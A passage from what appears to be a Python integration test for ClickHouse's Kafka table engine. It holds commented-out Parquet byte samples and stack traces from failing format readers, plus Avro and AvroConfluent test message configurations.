# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:95: DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1df2cec7 in /usr/bin/clickhouse
# /contrib/libcxx/include/type_traits:3519: decltype(std::__1::forward<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&>(fp)(std::__1::forward<DB::ReadBuffer&>(fp0), std::__1::forward<DB::Block const&>(fp0), std::__1::forward<DB::RowInputFormatParams const&>(fp0), std::__1::forward<DB::FormatSettings const&>(fp0))) std::__1::__invoke<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2ce6a in /usr/bin/clickhouse
# /contrib/libcxx/include/__functional_base:317: std::__1::shared_ptr<DB::IInputFormat> std::__1::__invoke_void_return_wrapper<std::__1::shared_ptr<DB::IInputFormat> >::__call<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2cd7d in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1540: std::__1::__function::__alloc_func<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0, std::__1::allocator<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2ccda in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1714: std::__1::__function::__func<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0, std::__1::allocator<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2bdec in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1867: std::__1::__function::__value_func<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd14dbd in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:2473: std::__1::function<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd07035 in /usr/bin/clickhouse
# /src/Formats/FormatFactory.cpp:258: DB::FormatFactory::getInputFormat(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, DB::ReadBuffer&, DB::Block const&, DB::Context const&, unsigned long, std::__1::function<void ()>) const @ 0x1dd04007 in /usr/bin/clickhouse
# /src/Storages/Kafka/KafkaBlockInputStream.cpp:76: DB::KafkaBlockInputStream::readImpl() @ 0x1d8f6559 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/DataStreams/copyData.cpp:26: void DB::copyDataImpl<DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)>(DB::IBlockInputStream&, DB::IBlockOutputStream&, DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)) @ 0x1c9ea01c in /usr/bin/clickhouse
# /src/DataStreams/copyData.cpp:63: DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*) @ 0x1c9e9fc7 in /usr/bin/clickhouse
# /src/Storages/Kafka/StorageKafka.cpp:565: DB::StorageKafka::streamToViews() @ 0x1d8cc3fa in /usr/bin/clickhouse
# # 'data_sample' : [
# # b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
# # b'\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
# # b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
# # ''
# # ],
# },
'AvroConfluent': {
'data_sample': [
avro_confluent_message(cluster.schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
b''.join([avro_confluent_message(cluster.schema_registry_client,
{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1}) for id in range(1, 16)]),
avro_confluent_message(cluster.schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
cluster.schema_registry_host,
cluster.schema_registry_port
),
'supports_empty_value': True,
},
'Avro': {
# It seems impossible to send more than one avro file per a message
# because of nature of Avro: blocks go one after another
'data_sample': [
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
avro_message([{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1} for id in range(1, 16)]),
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'supports_empty_value': False,
}
# 'Arrow' : {
# # Not working at all: DB::Exception: Error while opening a table: Invalid: File is too small: 0, Stack trace (when copying this message, always include the lines below):
# # /src/Common/Exception.cpp:37: DB::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x15c2d2a3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:88: DB::ArrowBlockInputFormat::prepareReader() @ 0x1ddff1c3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:26: DB::ArrowBlockInputFormat::ArrowBlockInputFormat(DB::ReadBuffer&, DB::Block const&, bool) @ 0x1ddfef63 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ArrowBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, bool&&, 0ul, 1ul, 2ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>, std::__1::__tuple_indices<0ul, 1ul, 2ul>) @ 0x1de0470f in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ArrowBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&, bool&&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ArrowBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>) @ 0x1de04375 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ArrowBlockInputFormat, std::__1::allocator<DB::ArrowBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&, bool>(std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03f97 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ArrowBlockInputFormat>::value), std::__1::shared_ptr<DB::ArrowBlockInputFormat> >::type std::__1::make_shared<DB::ArrowBlockInputFormat, DB::ReadBuffer&, DB::Block const&, bool>(DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03d4c in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:107: DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_0::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1de010df in /usr/bin/clickhouse
# 'data_sample' : [
